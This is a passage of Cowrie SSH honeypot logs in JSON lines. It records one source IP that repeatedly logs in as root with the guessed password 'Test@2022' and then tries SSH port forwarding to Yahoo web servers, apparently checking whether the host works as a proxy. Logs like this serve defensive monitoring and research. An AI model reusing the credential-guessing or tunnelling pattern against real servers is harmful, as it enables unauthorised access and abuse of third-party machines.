{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":44698,"dst_ip":"1.2.3.4","dst_port":22,"session":"5622e8a17b4c","protocol":"ssh","message":"New connection: 213.209.150.239:44698 (1.2.3.4:22) [session: 5622e8a17b4c]","sensor":"my-vps","timestamp":"2025-08-26T01:06:58.612002Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:58.612675Z","src_ip":"213.209.150.239","session":"5622e8a17b4c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:58.660110Z","src_ip":"213.209.150.239","session":"5622e8a17b4c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:58.894950Z","src_ip":"213.209.150.239","session":"5622e8a17b4c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":21151,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:21151","sensor":"my-vps","timestamp":"2025-08-26T01:06:58.942980Z","session":"5622e8a17b4c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:58.990462Z","src_ip":"213.209.150.239","session":"5622e8a17b4c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":10489,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:10489","sensor":"my-vps","timestamp":"2025-08-26T01:06:59.125664Z","session":"5622e8a17b4c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:59.173348Z","src_ip":"213.209.150.239","session":"5622e8a17b4c"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:59.221381Z","src_ip":"213.209.150.239","session":"5622e8a17b4c"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":44759,"dst_ip":"1.2.3.4","dst_port":22,"session":"60961524bb2c","protocol":"ssh","message":"New connection: 213.209.150.239:44759 (1.2.3.4:22) [session: 60961524bb2c]","sensor":"my-vps","timestamp":"2025-08-26T01:06:59.267525Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:59.268777Z","src_ip":"213.209.150.239","session":"60961524bb2c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:59.315959Z","src_ip":"213.209.150.239","session":"60961524bb2c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:59.550466Z","src_ip":"213.209.150.239","session":"60961524bb2c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":22558,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:22558","sensor":"my-vps","timestamp":"2025-08-26T01:06:59.598374Z","session":"60961524bb2c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:59.645920Z","src_ip":"213.209.150.239","session":"60961524bb2c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":31424,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:31424","sensor":"my-vps","timestamp":"2025-08-26T01:06:59.781482Z","session":"60961524bb2c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:59.828554Z","src_ip":"213.209.150.239","session":"60961524bb2c"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:59.876932Z","src_ip":"213.209.150.239","session":"60961524bb2c"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":44810,"dst_ip":"1.2.3.4","dst_port":22,"session":"27a5ac6b271b","protocol":"ssh","message":"New connection: 213.209.150.239:44810 (1.2.3.4:22) [session: 27a5ac6b271b]","sensor":"my-vps","timestamp":"2025-08-26T01:06:59.932467Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:59.933384Z","src_ip":"213.209.150.239","session":"27a5ac6b271b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:59.989995Z","src_ip":"213.209.150.239","session":"27a5ac6b271b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:00.271579Z","src_ip":"213.209.150.239","session":"27a5ac6b271b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":18383,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:18383","sensor":"my-vps","timestamp":"2025-08-26T01:07:00.329186Z","session":"27a5ac6b271b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:00.385777Z","src_ip":"213.209.150.239","session":"27a5ac6b271b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":18956,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:18956","sensor":"my-vps","timestamp":"2025-08-26T01:07:00.542907Z","session":"27a5ac6b271b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:00.599554Z","src_ip":"213.209.150.239","session":"27a5ac6b271b"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:00.657031Z","src_ip":"213.209.150.239","session":"27a5ac6b271b"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":44860,"dst_ip":"1.2.3.4","dst_port":22,"session":"13b6e755b40b","protocol":"ssh","message":"New connection: 213.209.150.239:44860 (1.2.3.4:22) [session: 13b6e755b40b]","sensor":"my-vps","timestamp":"2025-08-26T01:07:00.702998Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:00.703787Z","src_ip":"213.209.150.239","session":"13b6e755b40b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:00.750897Z","src_ip":"213.209.150.239","session":"13b6e755b40b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:00.984608Z","src_ip":"213.209.150.239","session":"13b6e755b40b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":323,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:323","sensor":"my-vps","timestamp":"2025-08-26T01:07:01.033265Z","session":"13b6e755b40b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:01.080449Z","src_ip":"213.209.150.239","session":"13b6e755b40b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":8739,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:8739","sensor":"my-vps","timestamp":"2025-08-26T01:07:01.217446Z","session":"13b6e755b40b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:01.264583Z","src_ip":"213.209.150.239","session":"13b6e755b40b"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:01.312892Z","src_ip":"213.209.150.239","session":"13b6e755b40b"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":44910,"dst_ip":"1.2.3.4","dst_port":22,"session":"98e5272a2611","protocol":"ssh","message":"New connection: 213.209.150.239:44910 (1.2.3.4:22) [session: 98e5272a2611]","sensor":"my-vps","timestamp":"2025-08-26T01:07:01.368886Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:01.369663Z","src_ip":"213.209.150.239","session":"98e5272a2611"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:01.426761Z","src_ip":"213.209.150.239","session":"98e5272a2611"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:01.710392Z","src_ip":"213.209.150.239","session":"98e5272a2611"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":4626,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:4626","sensor":"my-vps","timestamp":"2025-08-26T01:07:01.768588Z","session":"98e5272a2611"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:01.826084Z","src_ip":"213.209.150.239","session":"98e5272a2611"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":26225,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:26225","sensor":"my-vps","timestamp":"2025-08-26T01:07:01.983584Z","session":"98e5272a2611"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:02.040571Z","src_ip":"213.209.150.239","session":"98e5272a2611"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:02.098758Z","src_ip":"213.209.150.239","session":"98e5272a2611"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":44979,"dst_ip":"1.2.3.4","dst_port":22,"session":"60d559413a26","protocol":"ssh","message":"New connection: 213.209.150.239:44979 (1.2.3.4:22) [session: 60d559413a26]","sensor":"my-vps","timestamp":"2025-08-26T01:07:02.155080Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:02.156368Z","src_ip":"213.209.150.239","session":"60d559413a26"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","r